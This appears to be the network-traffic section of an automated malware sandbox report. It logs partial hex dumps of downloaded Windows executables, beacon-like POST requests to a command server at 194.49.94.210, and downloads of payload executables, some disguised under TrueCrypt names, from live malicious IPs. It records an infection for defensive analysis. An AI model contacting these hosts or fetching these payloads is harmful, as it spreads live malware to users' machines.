Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:02:45 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4Last-Modified: Fri, 17 Nov 2023 15:59:44 GMTETag: "102200-60a5b39950d4e"Accept-Ranges: bytesContent-Length: 1057280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 e2 8d 57 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 1a 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 10 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 18 10 00 00 20 00 00 00 1a 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 40 10 00 00 06 00 00 00 1c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2d 0f 00 b0 0a 01 00 01 00 00 00 0c 00 00 06 d8 f4 00 00 d8 38 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 74 03 00 06 2a 06 2a 13 30 02 00 2f 00 00 00 01 00 00 11 12 00 28 01 00 00 0a 7d 02 00 00 04 12 00 15 7d 01 00 00 04 12 00 7c 02 00 00 04 12 00 28 01 00 00 2b 12 00 7c 02 00 00 04 28 03 00 00 0a 2a 00 13 30 02 00 37 00 00 00 02 00 00 11 12 00 28 01 00 00 0a 7d 06 00 00 04 12 00 02 7d 07 00 00 04 12 00 15 7d 05 00 00 04 12 00 7c 06 00 00 04 12 00 28 02 00 00 2b 12 00 7c 06 00 00 04 28 03 00 00 0a 2a 00 1b 30 03 00 58 01 00 00 03 00 00 11 02 7b 01 00 00 04 0a 06 2c 3e 06 17 3b f4 00 00 00 28 0b 00 00 06 6f 05 00 00 0a 0b 12 01 28 06 00 00 0a 2d 3f 02 16 25 0a 7d 01 00 00 04 02 07 7d 03 00 00 04 02 7c 02 00 00 04 12 01 02 28 03 00 00 2b dd 0f 01 00 00 02 7b 03 00 00 04 0b 02 7c 03 00 00 04 fe 15 02 00 00 1b 02 15 25 0a 7d 01 00 00 04 12 01 28 08 00 00 0a 28 09 00 00 0a 28 0a 00 00 0a 0c 12 02 28 0b 00 00 0a 75 0e 00 00 01 20 a1 7c 00 00 28 68 03 00 06 6f 0c 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 18 Nov 2023 09:02:49 GMTContent-Type: application/octet-streamContent-Length: 12832256Last-Modified: Fri, 17 Nov 2023 15:57:58 GMTConnection: keep-aliveETag: "65578d86-c3ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 8d 57 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c4 c3 00 00 08 00 00 00 00 00 00 4e e3 c3 00 00 20 00 00 00 00 c4 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 c4 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e3 c3 00 4b 00 00 00 00 00 c4 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c4 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 c3 c3 00 00 20 00 00 00 c4 c3 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 c4 00 00 06 00 00 00 c6 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 c4 00 00 02 00 00 00 cc c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 e3 c3 00 00 00 00 00 48 00 00 00 02 00 05 00 4c cd c3 00 b4 15 00 00 03 00 00 00 01 00 00 06 00 28 00 00 49 a5 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:03:06 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Wed, 15 Nov 2023 20:36:00 GMTETag: "45600-60a36d9e76d64"Accept-Ranges: bytesContent-Length: 284160Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 01 08 6f 7a 60 66 3c 7a 60 66 3c 7a 60 66 3c 64 32 e2 3c 59 60 66 3c 64 32 f3 3c 6b 60 66 3c 64 32 e5 3c 33 60 66 3c b9 6f 3b 3c 79 60 66 3c 7a 60 67 3c 2b 60 66 3c 73 18 e2 3c 7b 60 66 3c 73 18 f7 3c 7b 60 66 3c 52 69 63 68 7a 60 66 3c 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 2b 55 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a2 00 00 00 bc 03 00 00 00 00 00 c4 42 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 04 00 00 04 00 00 00 00 00 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 e3 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 85 a0 00 00 00 10 00 00 00 a2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 29 00 00 00 c0 00 00 00 2a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 90 03 00 00 f0 00 00 00 86 03 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:03:08 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Wed, 15 Nov 2023 20:19:53 GMTETag: "1186000-60a36a043a58d"Accept-Ranges: bytesContent-Length: 18374656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 02 80 00 00 5c 18 01 00 b4 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 a0 1f 01 00 04 00 00 97 59 19 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 1d 01 59 01 00 00 00 10 1d 01 9c 1a 00 00 00 50 1d 01 10 11 00 00 00 60 15 01 60 60 00 00 00 00 00 00 00 00 00 00 00 70 1d 01 a0 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 48 15 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 15 1d 01 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 00 80 00 00 10 00 00 00 02 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 90 89 05 00 00 20 80 00 00 8a 05 00 00 06 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 b0 a8 8f 00 00 b0 85 00 00 aa 8f 00 00 90 85 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 60 60 00 00 00 60 15 01 00 62 00 00 00 3a 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 e8 6b 00 00 00 d0 15 01 00 6c 00 00 00 9c 15 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 b2 06 00 00 40 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 59 01 00 00 00 00 1d 01 00 02 00 00 00 08 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 9c 1a 00 00 00 10 1d 01 00 1c 00 00 00 0a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 30 1d 01 00 02 00 00 00 26 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 1d 01 00 02 00 00 00 28 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 10 11 00 00 00 50 1d 01 00 12 00 00 00 2a 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 a0 22 02 00 00 70 1d 01 00 24 02 00 00 3c 16 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 18 Nov 2023 09:03:24 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 17 Nov 2023 12:04:41 GMTETag: "108c800-60a57f0f5fb8d"Accept-Ranges: bytesContent-Length: 17352704Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 68 6c 00 00 c4 08 01 00 d2 06 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 20 10 01 00 04 00 00 c9 2d 09 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 c0 0d 01 4e 00 00 00 00 d0 0d 01 64 13 00 00 00 10 0e 01 08 11 00 00 00 c0 06 01 80 0d 00 00 00 00 00 00 00 00 00 00 00 30 0e 01 fc e3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 06 01 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 d4 0d 01 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 67 6c 00 00 10 00 00 00 68 6c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 60 60 2e 64 61 74 61 00 00 00 70 b9 06 00 00 80 6c 00 00 ba 06 00 00 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 d0 76 93 00 00 40 73 00 00 78 93 00 00 26 73 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 80 0d 00 00 00 c0 06 01 00 0e 00 00 00 9e 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 90 0b 00 00 00 d0 06 01 00 0c 00 00 00 ac 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 e0 d0 06 00 00 e0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 4e 00 00 00 00 c0 0d 01 00 02 00 00 00 b8 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 64 13 00 00 00 d0 0d 01 00 14 00 00 00 ba 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 70 00 00 00 00 f0 0d 01 00 02 00 00 00 ce 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 0e 01 00 02 00 00 00 d0 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 08 11 00 00 00 10 0e 01 00 12 00 00 00 d2 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc e3 01 00 00 30 0e 01 00 e4 01 00 00 e4 06 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: unknown

HTTPS traffic detected: 104.21.35.168:443 -> 192.168.2.4:49793 version: TLS 1.0

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: global traffic	HTTP traffic detected: GET /widget/demo/156.146.49.168 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://odndjqveglvvb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qmebwxpdbgoa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjroicjqqmgntlw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bhniqbswtnh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sxgskimjbliad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nvodgmuklrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vrbtkwrvvvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pgiuvevlnge.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /traffico.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.145
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jlkdrqfnhbbwddxd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nwvpdxhgvgnlfy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /TrueCrypt_KlHkcF.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jhdrdchleymbbryf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gljuxpwsagkiabxi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /Chjirossjr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.196.9.161
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ktbhigaoacrwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uieodwfhihnk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /brandrock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.65.80
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uxojddkuvbahuqko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gahbanwghcabjhyj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.72
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kdkneuviugi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ktylhymapjrcyay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: GET /TrueCrypt_lDwnwJ.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tbfnyxobqor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qpdgiqckodsdd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: 194.49.94.210
Source: global traffic	HTTP traffic detected: POST /fks/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bknwnekkxjnwlw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: 194.49.94.210
